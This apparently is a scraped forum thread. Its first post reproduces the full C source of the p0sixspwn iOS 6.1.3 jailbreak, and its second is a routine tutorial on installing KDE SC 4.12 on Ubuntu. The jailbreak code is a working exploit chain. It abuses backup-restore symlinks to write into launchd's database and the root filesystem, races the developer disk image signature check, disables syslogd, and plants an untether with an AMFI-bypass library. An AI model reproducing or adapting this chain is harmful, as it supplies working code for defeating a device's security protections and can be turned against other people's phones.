  17. * pris0nbarake - jailbreak.c * * Exploits from evasi0n and absinthe2. And others. /*** pris0nbarake - jailbreak.c * * Exploits from evasi0n and absinthe2. And others. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. **/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <getopt.h> #include <dirent.h> #include <signal.h> #include <plist/plist.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/errno.h> #include <assert.h> #include <libimobiledevice/libimobiledevice.h> #include <libimobiledevice/lockdown.h> #include <libimobiledevice/mobile_image_mounter.h> #include <libimobiledevice/mobilebackup2.h> #include <libimobiledevice/notification_proxy.h> #include <libimobiledevice/afc.h> #include <libimobiledevice/sbservices.h> #include <libimobiledevice/file_relay.h> #include <libimobiledevice/diagnostics_relay.h> #include <zlib.h> #include <fcntl.h> #include <sys/mman.h> #include "partialcommon.h" #include "partial.h" #include "common.h" #include "MobileDevice.h" #define AFCTMP "HackStore" typedef struct _compatibility { char *product; char *build; } compatibility_t; compatibility_t compatible_devices[] = { {"N81AP", "10B400"}, {"N41AP", "10B350"}, {"N42AP", "10B350"}, {"N94AP", "10B329"}, {"N90BAP", "10B329"}, {"N90AP", "10B329"}, {"N92AP", "10B329"}, {"N81AP", "10B329"}, {"N88AP", "10B329"}, {"N78AP", "10B329"}, {"N41AP", "10B329"}, {"N42AP", "10B329"}, {"J1AP", "10B329"}, {"J2AP", "10B329"}, {"J2aAP", "10B329"}, {"P101AP", "10B329"}, {"P102AP", "10B329"}, {"P103AP", "10B329"}, {"K93AP", "10B329"}, {"K93AAP", "10B329"}, {"K94AP", "10B329"}, {"K95AP", "10B329"}, {"P105AP", "10B329"}, {"P106AP", "10B329"}, {"P107AP", "10B329"}, {NULL, NULL} }; static int cpio_get_file_name_length(void *cpio) { if (cpio) { char buffer[7]; int val; memset(buffer, '\0', 7); memcpy(&buffer, (void *) (cpio + 59), 6); /* File Name Length */ val = strtoul(buffer, NULL, 8); return val; } else { return 0; } } static int cpio_get_file_length(void *cpio) { if (cpio) { char buffer[12]; int val; memset(buffer, '\0', 12); memcpy(&buffer, (void *) (cpio + 65), 11); /* File Length */ val = strtoul(buffer, NULL, 8); return val; } else { return 0; } } /* recursively remove path, including path */ static void rmdir_recursive(const char *path) { /*{{{ */ if (!path) { return; } DIR *cur_dir = opendir(path); if (cur_dir) { struct dirent *ep; while ((ep = readdir(cur_dir))) { if ((strcmp(ep->d_name, ".") == 0) || (strcmp(ep->d_name, "..") == 0)) { continue; } char *fpath = (char *) malloc(strlen(path) + 1 + strlen(ep->d_name) + 1); if (fpath) { struct stat st; strcpy(fpath, path); strcat(fpath, "/"); strcat(fpath, ep->d_name); if ((stat(fpath, &st) == 0) && S_ISDIR(st.st_mode)) { rmdir_recursive(fpath); } else { if (remove(fpath) != 0) { DEBUG("could not remove file %s: %s\n", fpath, strerror(errno)); } } free(fpath); } } closedir(cur_dir); } if (rmdir(path) != 0) { fprintf(stderr, "could not remove directory %s: %s\n", path, strerror(errno)); } } /*}}} */ static void print_xml(plist_t node) { char *xml = NULL; uint32_t len = 0; plist_to_xml(node, &xml, &len); if (xml) puts(xml); } /* char** freeing helper function */ static void free_dictionary(char **dictionary) { /*{{{ */ int i = 0; if (!dictionary) return; for (i = 0; dictionary; i++) { free(dictionary); } free(dictionary); } /*}}} */ /* recursively remove path via afc, (incl = 1 including path, incl = 0, NOT including path) */ static int rmdir_recursive_afc(afc_client_t afc, const char *path, int incl) { /*{{{ */ char **dirlist = NULL; if (afc_read_directory(afc, path, &dirlist) != AFC_E_SUCCESS) { //fprintf(stderr, "AFC: could not get directory list for %s\n", path); return -1; } if (dirlist == NULL) { if (incl) { afc_remove_path(afc, path); } return 0; } char **ptr; for (ptr = dirlist; *ptr; ptr++) { if ((strcmp(*ptr, ".") == 0) || (strcmp(*ptr, "..") == 0)) { continue; } char **info = NULL; char *fpath = (char *) malloc(strlen(path) + 1 + strlen(*ptr) + 1); strcpy(fpath, path); strcat(fpath, "/"); strcat(fpath, *ptr); if ((afc_get_file_info(afc, fpath, &info) != AFC_E_SUCCESS) || !info) { // failed. try to delete nevertheless. afc_remove_path(afc, fpath); free(fpath); free_dictionary(info); continue; } int is_dir = 0; int i; for (i = 0; info; i += 2) { if (!strcmp(info, "st_ifmt")) { if (!strcmp(info[i + 1], "S_IFDIR")) { is_dir = 1; } break; } } free_dictionary(info); if (is_dir) { rmdir_recursive_afc(afc, fpath, 0); } afc_remove_path(afc, fpath); free(fpath); } free_dictionary(dirlist); if (incl) { afc_remove_path(afc, path); } return 0; } /*}}} */ static int connected = 0; void jb_device_event_cb(const idevice_event_t * event, void *user_data) { char *uuid = (char *) user_data; DEBUG("device event %d: %s\n", event->event, event->udid); if (uuid && strcmp(uuid, event->udid)) return; if (event->event == IDEVICE_DEVICE_ADD) { connected = 1; } else if (event->event == IDEVICE_DEVICE_REMOVE) { connected = 0; } } static void idevice_event_cb(const idevice_event_t * event, void *user_data) { jb_device_event_cb(event, user_data); } typedef struct __csstores { uint32_t csstore_number; } csstores_t; static csstores_t csstores[16]; static int num_of_csstores = 0; int check_consistency(char *product, char *build) { // Seems legit. return 0; } int verify_product(char *product, char *build) { compatibility_t *curcompat = &compatible_devices[0]; while ((curcompat) && (curcompat->product != NULL)) { if (!strcmp(curcompat->product, product) && !strcmp(curcompat->build, build)) return 0; curcompat++; } return 1; } const char *lastmsg = NULL; static void status_cb(const char *msg, int progress) { if (!msg) { msg = lastmsg; } else { lastmsg = msg; } DEBUG("[%d%%] %s\n", progress, msg); } #ifndef __GUI__ int main(int argc, char *argv[]) { device_t *device = NULL; char *uuid = NULL; char *product = NULL; char *build = NULL; int old_os = 0; /********************************************************/ /* * device detection */ /********************************************************/ if (!uuid) { device = device_create(NULL); if (!device) { ERROR("No device found, is it plugged in?\n"); return -1; } uuid = strdup(device->uuid); } else { DEBUG("Detecting device...\n"); device = device_create(uuid); if (device == NULL) { ERROR("Unable to connect to device\n"); return -1; } } DEBUG("Connected to device with UUID %s\n", uuid); lockdown_t *lockdown = lockdown_open(device); if (lockdown == NULL) { ERROR("Lockdown connection failed\n"); device_free(device); return -1; } if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS) || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) { ERROR("Could not get device information\n"); lockdown_free(lockdown); device_free(device); return -1; } DEBUG("Device is a %s with build %s\n", product, build); if (verify_product(product, build) != 0) { ERROR("Device is not supported\n"); return -1; } plist_t pl = NULL; lockdown_get_value(lockdown, NULL, "ActivationState", &pl); if (pl && plist_get_node_type(pl) == PLIST_STRING) { char *as = NULL; plist_get_string_val(pl, &as); plist_free(pl); if (as) { if (strcmp(as, "Unactivated") == 0) { free(as); ERROR("The attached device is not activated. You need to activate it before it can be used with this jailbreak.\n"); lockdown_free(lockdown); device_free(device); return -1; } free(as); } } pl = NULL; lockdown_get_value(lockdown, "com.apple.mobile.backup", "WillEncrypt", &pl); if (pl && plist_get_node_type(pl) == PLIST_BOOLEAN) { char c = 0; plist_get_bool_val(pl, &c); plist_free(pl); if © { ERROR("You have a device backup password set. You need to disable the backup password in iTunes.\n"); lockdown_free(lockdown); device_free(device); return -1; } } lockdown_free(lockdown); device_free(device); device = NULL; idevice_event_subscribe(idevice_event_cb, uuid); jailbreak_device(uuid, status_cb); return 0; } #endif static void plist_replace_item(plist_t plist, char *name, plist_t item) { if (plist_dict_get_item(plist, name)) plist_dict_remove_item(plist, name); plist_dict_insert_item(plist, name, item); } kern_return_t send_message(service_conn_t socket, CFPropertyListRef plist); CFPropertyListRef receive_message(service_conn_t socket); static char *real_dmg, *real_dmg_signature, *ddi_dmg; static void print_data(CFDataRef data) { if (data == NULL) { DEBUG("[null]\n"); return; } DEBUG("[%.*s]\n", (int) CFDataGetLength(data), CFDataGetBytePtr(data)); } void qwrite(afc_connection * afc, const char *from, const char *to) { DEBUG("Sending %s -> %s... ", from, to); afc_file_ref ref; int fd = open(from, O_RDONLY); assert(fd != -1); size_t size = (size_t) lseek(fd, 0, SEEK_END); void *buf = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 0); assert(buf != MAP_FAILED); AFCFileRefOpen(afc, to, 3, &ref); AFCFileRefWrite(afc, ref, buf, size); AFCFileRefClose(afc, ref); DEBUG("done.\n"); close(fd); } int timesl, tries = 0; volatile int is_ddid = 0; #undef assert #define assert(x) (x) /* badcode is bad */ static void cb2(am_device_notification_callback_info * info, void *foo) { timesl = 1000; struct am_device *dev; DEBUG("... %x\n", info->msg); if (is_ddid) CFRunLoopStop(CFRunLoopGetCurrent()); if (info->msg == ADNCI_MSG_CONNECTED) { dev = info->dev; tries++; if (tries >= 30) { is_ddid = -1; return; } AMDeviceConnect(dev); assert(AMDeviceIsPaired(dev)); assert(!AMDeviceValidatePairing(dev)); assert(!AMDeviceStartSession(dev)); CFStringRef product = AMDeviceCopyValue(dev, 0, CFSTR("ProductVersion")); assert(product); UniChar first = CFStringGetCharacterAtIndex(product, 0); int epoch = first - '0'; Retry: printf("."); fflush(stdout); service_conn_t afc_socket = 0; struct afc_connection *afc = NULL; assert(!AMDeviceStartService(dev, CFSTR("com.apple.afc"), &afc_socket, NULL)); assert(!AFCConnectionOpen(afc_socket, 0, &afc)); assert(!AFCDirectoryCreate(afc, "PublicStaging")); AFCRemovePath(afc, "PublicStaging/staging.dimage"); qwrite(afc, real_dmg, "PublicStaging/staging.dimage"); if (ddi_dmg) qwrite(afc, ddi_dmg, "PublicStaging/ddi.dimage"); service_conn_t mim_socket1 = 0; service_conn_t mim_socket2 = 0; assert(!AMDeviceStartService(dev, CFSTR("com.apple.mobile.mobile_image_mounter"), &mim_socket1, NULL)); assert(mim_socket1); CFPropertyListRef result = NULL; CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); CFDictionarySetValue(dict, CFSTR("Command"), CFSTR("MountImage")); CFDictionarySetValue(dict, CFSTR("ImageType"), CFSTR("Developer")); CFDictionarySetValue(dict, CFSTR("ImagePath"), CFSTR("/var/mobile/Media/PublicStaging/staging.dimage")); int fd = open(real_dmg_signature, O_RDONLY); assert(fd != -1); uint8_t sig[128]; assert(read(fd, sig, sizeof(sig)) == sizeof(sig)); close(fd); CFDictionarySetValue(dict, CFSTR("ImageSignature"), CFDataCreateWithBytesNoCopy(NULL, sig, sizeof(sig), kCFAllocatorNull)); send_message(mim_socket1, dict); if (ddi_dmg) { DEBUG("sleep %d\n", timesl); usleep(timesl); assert(!AFCRenamePath(afc, "PublicStaging/ddi.dimage", "PublicStaging/staging.dimage")); } DEBUG("receive 1:\n"); result = receive_message(mim_socket1); print_data(CFPropertyListCreateXMLData(NULL, result)); if (strstr(CFDataGetBytePtr(CFPropertyListCreateXMLData(NULL, result)), "ImageMountFailed")) { timesl += 100; goto Retry; } is_ddid = 1; CFRunLoopStop(CFRunLoopGetCurrent()); fflush(stdout); } } void stroke_lockdownd(device_t * device) { plist_t crashy = plist_new_dict(); char *request = NULL; unsigned int size = 0; idevice_connection_t connection; uint32_t magic; uint32_t sent = 0; plist_dict_insert_item(crashy, "Request", plist_new_string("Pair")); plist_dict_insert_item(crashy, "PairRecord", plist_new_bool(0)); plist_to_xml(crashy, &request, &size); magic = __builtin_bswap32(size); plist_free(crashy); if (idevice_connect(device->client, 62078, &connection)) { ERROR("Failed to connect to lockdownd.\n"); } idevice_connection_send(connection, &magic, 4, &sent); idevice_connection_send(connection, request, size, &sent); idevice_connection_receive_timeout(connection, &size, 4, &sent, 1500); size = __builtin_bswap32(size); if (size) { void *ptr = malloc(size); idevice_connection_receive_timeout(connection, ptr, &size, &sent, 5000); } idevice_disconnect(connection); // XXX: Wait for lockdownd to start. sleep(5); } struct mobile_image_mounter_client_private { void *parent; void *mutex; }; char* overrides_plist = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" "<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n" "<plist version=\"1.0\">\n" "<dict>\n" " <key>com.apple.syslogd</key>\n" " <dict>\n" " <key>Disabled</key>\n" " <true/>\n" " </dict>\n" "</dict>\n" "</plist>\n"; void callback(ZipInfo* info, CDFile* file, size_t progress) { int percentDone = progress * 100/file->compressedSize; printf("Getting: %d%%\n", percentDone); } int jailbreak_device(const char *uuid, status_cb_t cb) { char backup_dir[1024]; device_t *device = NULL; char *build = NULL; char *product = NULL; struct lockdownd_service_descriptor desc = { 0, 0 }; int is_jailbroken = 0; if (!uuid) { ERROR("Missing device UDID\n"); return -1; } assert(cb); tmpnam(backup_dir); DEBUG("Backing up files to %s\n", backup_dir); // Wait for a connection DEBUG("Connecting to device...\n"); cb("Connecting to device...\n", 2); int retries = 20; int i = 0; while (!connected && (i++ < retries)) { sleep(1); } if (!connected) { ERROR("Device connection failed\n"); return -1; } // Open a connection to our device DEBUG("Opening connection to device\n"); device = device_create(uuid); if (device == NULL) { ERROR("Unable to connect to device\n"); } lockdown_t *lockdown = lockdown_open(device); if (lockdown == NULL) { WARN("Lockdown connection failed\n"); device_free(device); return -1; } if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS) || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) { ERROR("Could not get device information\n"); if (product) { free(product); } if (build) { free(build); } lockdown_free(lockdown); device_free(device); return -1; } cb("Getting payload files from Apple... (if this fails, your internet connection has issues...)\n", 5); struct stat st; /* Hackcheck for network connection... */ ZipInfo* info2 = PartialZipInit("http://appldnld.apple.com/iOS6.1/091-2397.20130319.EEae9/iPad2,1_6.1.3_10B329_Restore.ipsw"); if(!info2) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info2, callback); CDFile* file = PartialZipFindFile(info2, "BuildManifest.plist"); if(!file) { ERROR("cannot file find\n"); return -1; } PartialZipRelease(info2); DEBUG("Device info: %s, %s\n", product, build); DEBUG("Beginning jailbreak, this may take a while...\n"); cb("Gathering information to generate jailbreak data...\n", 10); uint16_t port = 0; is_ddid = 0; if (lockdown_start_service(lockdown, "com.apple.afc2", &port) == 0) { char **fileinfo = NULL; uint32_t ffmt = 0; afc_client_t afc2 = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc2); if (afc2) { afc_get_file_info(afc2, "/Applications", &fileinfo); if (fileinfo) { int i; for (i = 0; fileinfo; i += 2) { if (!strcmp(fileinfo, "st_ifmt")) { if (strcmp(fileinfo[i + 1], "S_IFLNK") == 0) { ffmt = 1; } break; } } afc_free_dictionary(fileinfo); fileinfo = NULL; if (ffmt) { ERROR("Device already jailbroken! Detected stash."); afc_client_free(afc2); lockdown_free(lockdown); device_free(device); cb("Device already jailbroken, detected stash.", 100); return 0; } } afc_get_file_info(afc2, "/private/etc/launchd.conf", &fileinfo); if (fileinfo) { ERROR("Device already jailbroken! Detected untether."); afc_client_free(afc2); lockdown_free(lockdown); device_free(device); cb("Device already jailbroken, detected untether.", 100); return 0; } afc_client_free(afc2); } } if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { ERROR("Failed to start AFC service", 0); lockdown_free(lockdown); device_free(device); return -1; } lockdown_free(lockdown); lockdown = NULL; afc_client_t afc = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { ERROR("Could not connect to AFC service\n"); device_free(device); return -1; } // check if directory exists char **list = NULL; if (afc_read_directory(afc, "/" AFCTMP, &list) != AFC_E_SUCCESS) { // we're good, directory does not exist. } else { free_dictionary(list); WARN("Looks like you attempted to apply this Jailbreak and it failed. Will try to fix now...\n", 0); sleep(5); goto fix; } afc_client_free(afc); afc = NULL; /** SYMLINK: Recordings/.haxx -> /var */ rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); char *bargv[] = { "idevicebackup2", "backup", backup_dir, NULL }; char *rargv[] = { "idevicebackup2", "restore", "--system", "--settings", "--reboot", backup_dir, NULL }; char *rargv2[] = { "idevicebackup2", "restore", "--system", "--settings", backup_dir, NULL }; backup_t *backup; rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); idevicebackup2(3, bargv); cb("Sending initial data...\n", 15); backup = backup_open(backup_dir, uuid); if (!backup) { fprintf(stderr, "ERROR: failed to open backup\n"); return -1; } /* Reboot for the sake of posterity. Gets rid of all Developer images mounted. */ { if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) { ERROR("Could not make folder\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/var/db/launchd.db/com.apple.launchd", 501, 501, 4) != 0) { ERROR("Failed to symlink var!\n"); return -1; } FILE *f = fopen("payload/common/overrides.plist", "wb+"); fwrite(overrides_plist, sizeof(overrides_plist), 1, f); fclose(f); if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/overrides.plist", "Media/Recordings/.haxx/overrides.plist", 0100755, 0, 0, 4) != 0) { ERROR("Could not add tar"); return -1; } } idevicebackup2(6, rargv); unlink("payload/common/overrides.plist"); backup_free(backup); cb("Waiting for reboot. Do not unplug your device.\n", 18); /********************************************************/ /* wait for device reboot */ /********************************************************/ // wait for disconnect while (connected) { sleep(2); } DEBUG("Device %s disconnected\n", uuid); // wait for device to connect while (!connected) { sleep(2); } DEBUG("Device %s detected. Connecting...\n", uuid); sleep(10); /********************************************************/ /* wait for device to finish booting to springboard */ /********************************************************/ device = device_create(uuid); if (!device) { ERROR("ERROR: Could not connect to device. Aborting."); // we can't recover since the device connection failed... return -1; } lockdown = lockdown_open(device); if (!lockdown) { device_free(device); ERROR("ERROR: Could not connect to lockdown. Aborting"); // we can't recover since the device connection failed... return -1; } retries = 100; int done = 0; sbservices_client_t sbsc = NULL; plist_t state = NULL; DEBUG("Waiting for SpringBoard...\n"); while (!done && (retries-- > 0)) { port = 0; lockdown_start_service(lockdown, "com.apple.springboardservices", &port); if (!port) { continue; } sbsc = NULL; desc.port = port; sbservices_client_new(device->client, &desc, &sbsc); if (!sbsc) { continue; } if (sbservices_get_icon_state(sbsc, &state, "2") == SBSERVICES_E_SUCCESS) { plist_free(state); state = NULL; done = 1; } sbservices_client_free(sbsc); if (done) { sleep(3); DEBUG("bootup complete\n"); break; } sleep(3); } lockdown_free(lockdown); lockdown = NULL; /* Download images. */ if(stat("payload/iOSUpdaterHelper.dmg", &st)) { ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa"); if(!info) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info, callback); CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg"); if(!file) { ERROR("Cannot find file in zip 1\n"); return -1; } unsigned char* data = PartialZipGetFile(info, file); int dataLen = file->size; PartialZipRelease(info); data = realloc(data, dataLen + 1); data[dataLen] = '\0'; FILE* out; out = fopen("payload/iOSUpdaterHelper.dmg", "wb+"); if (out == NULL) { ERROR("Failed to open file"); return -1; } fwrite(data, sizeof(char), dataLen, out); fclose(out); free(data); } if(stat("payload/iOSUpdaterHelper.dmg.signature", &st)) { ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa"); if(!info) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info, callback); CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg.signature"); if(!file) { ERROR("Cannot find file in zip 2\n"); return -1; } unsigned char* data = PartialZipGetFile(info, file); int dataLen = file->size; PartialZipRelease(info); data = realloc(data, dataLen + 1); data[dataLen] = '\0'; FILE* out; out = fopen("payload/iOSUpdaterHelper.dmg.signature", "wb+"); if (out == NULL) { ERROR("Failed to open file"); return -1; } fwrite(data, sizeof(char), dataLen, out); fclose(out); free(data); } /* * Upload DDI original. */ real_dmg = "payload/iOSUpdaterHelper.dmg"; real_dmg_signature = "payload/iOSUpdaterHelper.dmg.signature"; ddi_dmg = "payload/hax.dmg"; cb("Waiting for device...\n", 25); //dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{ AMDAddLogFileDescriptor(2); am_device_notification * notif; assert(!AMDeviceNotificationSubscribe(cb2, 0, 0, NULL, &notif)); CFRunLoopRun(); //}); while (!is_ddid) ; if (is_ddid == -1) { ERROR("Failed to mount image\n"); cb("Failed to mount image\n", 10); return -1; } /** DDI Mounted! */ if (!lockdown) lockdown = lockdown_open(device); cb("Remounting root...\n", 40); if (lockdown_start_service(lockdown, "r", &port) != 0) { DEBUG("Timed out on doing so... doesn't really matter though..\n"); } /* Delete files */ unlink("payload/iOSUpdaterHelper.dmg"); unlink("payload/iOSUpdaterHelper.dmg.signature"); /** Install bootstrap. */ rmdir_recursive_afc(afc, "/Recordings", 1); if (lockdown_start_service(lockdown, "com.apple.afc2", &port) != 0) { ERROR("Device failed to mount image proper!\n"); return -1; } /* * Goody, goody. Let's copy everything over! */ cb("Sending Cydia and untether payload to the device...\n", 70); rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); if (!afc) { lockdown = lockdown_open(device); port = 0; if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { WARN("Could not start AFC service. Aborting.\n"); lockdown_free(lockdown); goto leave; } lockdown_free(lockdown); desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { WARN("Could not connect to AFC. Aborting.\n"); goto leave; } } rmdir_recursive_afc(afc, "/Recordings", 1); idevicebackup2(3, bargv); backup = backup_open(backup_dir, uuid); if (!backup) { fprintf(stderr, "ERROR: failed to open backup\n"); return -1; } /* * Do it again. */ { if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) { ERROR("Could not make folder\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/", 501, 501, 4) != 0) { ERROR("Failed to symlink root!\n"); return -1; } if (backup_mkdir(backup, "MediaDomain", "Media/Recordings/.haxx/var/untether", 0755, 0, 0, 4) != 0) { ERROR("Could not make folder\n"); return -1; } { char jb_path[128]; char amfi_path[128]; char launchd_conf_path[128]; snprintf(jb_path, 128, "payload/common/untether", build, product); snprintf(amfi_path, 128, "payload/common/_.dylib", build, product); snprintf(launchd_conf_path, 128, "payload/common/launchd.conf", build, product); if (backup_add_file_from_path(backup, "MediaDomain", launchd_conf_path, "Media/Recordings/.haxx/var/untether/launchd.conf", 0100644, 0, 0, 4) != 0) { ERROR("Could not add launchd.conf"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/private/etc/launchd.conf", "/private/var/untether/launchd.conf", 0, 0, 4) != 0) { ERROR("Failed to symlink launchd.conf!\n"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/tar", "Media/Recordings/.haxx/var/untether/tar", 0100755, 0, 0, 4) != 0) { ERROR("Could not add tar"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/bin/tar", "/private/var/untether/tar", 0, 0, 4) != 0) { ERROR("Failed to symlink tar!\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/usr/libexec/dirhelper", "/private/var/untether/dirhelper", 0, 0, 4) != 0) { ERROR("Failed to symlink dirhelper!\n"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/install.deb", "Media/Recordings/.haxx/var/untether/install.deb", 0100755, 0, 0, 4) != 0) { ERROR("Could not add dirhelper"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/dirhelper", "Media/Recordings/.haxx/var/untether/dirhelper", 0100755, 0, 0, 4) != 0) { ERROR("Could not add dirhelper"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", jb_path, "Media/Recordings/.haxx/var/untether/untether", 0100755, 0, 0, 4) != 0) { ERROR("Could not add jb"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", amfi_path, "Media/Recordings/.haxx/var/untether/_.dylib", 0100644, 0, 0, 4) != 0) { ERROR("Could not add amfi"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/Cydia.tar", "Media/Recordings/.haxx/var/untether/Cydia.tar", 0100644, 0, 0, 4) != 0) { ERROR("Could not add cydia"); return -1; } } } idevicebackup2(5, rargv2); backup_free(backup); cb("Finalizing...\n", 90); DEBUG("Installed jailbreak, fixing up directories.\n"); rmdir_recursive_afc(afc, "/Recordings", 1); /********************************************************/ /* * move back any remaining dirs via AFC */ /********************************************************/ is_jailbroken = 1; fix: DEBUG("Recovering files...\n", 80); if (!afc) { lockdown = lockdown_open(device); port = 0; if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { WARN("Could not start AFC service. Aborting.\n"); lockdown_free(lockdown); goto leave; } lockdown_free(lockdown); lockdown = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { WARN("Could not connect to AFC. Aborting.\n"); goto leave; } } rmdir_recursive(backup_dir); WARN("Recovery complete.\n"); if (is_jailbroken) { cb("Your device is now jailbroken, it is now preparing to reboot automatically.\n", 100); WARN("Your device is now jailbroken, it is now preparing to reboot automatically.\n"); /* * Reboot device automatically. */ lockdown = lockdown_open(device); diagnostics_relay_client_t diagnostics_client = NULL; uint16_t diag_port = 0; lockdown_start_service(lockdown, "com.apple.mobile.diagnostics_relay", &diag_port); desc.port = diag_port; if (diagnostics_relay_client_new(device->client, &desc, &diagnostics_client) == DIAGNOSTICS_RELAY_E_SUCCESS) { diagnostics_relay_restart(diagnostics_client, 0); } } else { cb("Your device has encountered an error during the jailbreak process, unplug it and try again.\n", 100); WARN("Your device has encountered an error during the jailbreak process, unplug it and try again.\n"); } leave: afc_client_free(afc); afc = NULL; device_free(device); device = NULL; return 0; } Sursa completa: https://github.com/p0sixspwn/p0sixspwn
  18. [h=1]How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS[/h] December 31st, 2013, 04:40 GMT · By Marius Nestor The following tutorial will teach both existing and new Kubuntu/Ubuntu users how to install or upgrade the brand-new and featureful KDE SC 4.12 desktop environment on their existing and healthy Ubuntu/Kubuntu 13.10 (Saucy Salamander) and 12.04 LTS (Precise Pangolin) operating systems. After yet another six months of hard work, the beautiful KDE Software Compilation reached version 4.12 on December 18, 2013, bringing improvements to its main components: KDE Plasma Workspaces, KDE Applications and KDE Platform. As expected, the Kubuntu developers packaged the KDE Software Compilation's new version for its Kubuntu 13.10 and 12.04 LTS releases, via an easy to use PPA. However, the package also work well on other Ubuntu 13.10 and 12.04 LTS based Linux operating systems, so the following guide will teach you how to install KDE SC 4.12 on top of your existing Ubuntu installation. Step 1 – Add KDE SC 4.12 repositories Open a Terminal window by hitting the CTRL+ALT+T key combination on your keyboard. Copy and paste the following command in the Terminal window: sudo add-apt-repository ppa:kubuntu-ppa/backports Hit Enter, an type your password when asked, and hit the Enter key again. See the next screenshot for details, but do not close the Terminal window yet. Proceed to the next step! Adding the KDE SC 4.12 PPA in Ubuntu 13.10 Now, you need to update the entire package database on your system for the newly added PPA packages with the KDE SC 4.12 release. Copy and paste the following command: sudo apt-get update Hit Enter and wait for it to index the new packages. When it's done, execute the following command (copy and paste) to install KDE SC 4.12 or update your existing KDE installation to the 4.12 version: sudo apt-get install kubuntu-desktop Once again, hit the Enter key when asked if you want to install all the KDE SC 4.12 packages, and wait for them to be downloaded and installed, a process that will take some time, depending on your network connection and computer specs. Installing KDE SC 4.12 in Ubuntu 13.10 When all the KDE SC 4.12 packages have been installed, close the Terminal window and reboot your computer. Immediately after the boot screen, Ubuntu users will notice that the boot splash screen has been replaced with the Kubuntu one, as well as the login screen. At the login screen, select your username, click the button that says "Ubuntu" and select the KDE Plasma Workspace entry. See the screenshot below for details. The login screen of Kubuntu 13.10 Type your password and hit Enter to login. After a few seconds, the KDE SC 4.12 desktop environment will be loaded... Enjoy! KDE SC 4.12 on Ubuntu 13.10 Uninstalling KDE SC 4.12 (optional step) In case you don't like KDE SC 4.12 and you want to remove it from your system and return back to your previous desktop environment, open a Terminal window with the CTRL+ALT+T key combination, access this link and copy/paste that huge command in the terminal window, hit Enter to execute it and again when asked if you want to remove the packages. After that, type the following commands to remove the rest of the KDE packages from your system (one by one, hitting Enter after each one): sudo apt-get autoremove sudo apt-get install ppa-purge sudo ppa-purge ppa:kubuntu-ppa/backports sudo apt-get update sudo apt-get dist-upgrade sudo gedit /etc/lightdm/lightdm.conf Now replace "kde-plasma" with "ubuntu" under the 'user-session=' entry, and "lightdm-kde-greeter" with "unity-greeter" under the 'greeter-session=' entry. Save the file and close it. Reboot your computer and everything should be like it was before installing KDE. Do not hesitate to use our commenting system below in case you encounter any issues with the tutorial. Sursa: How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS
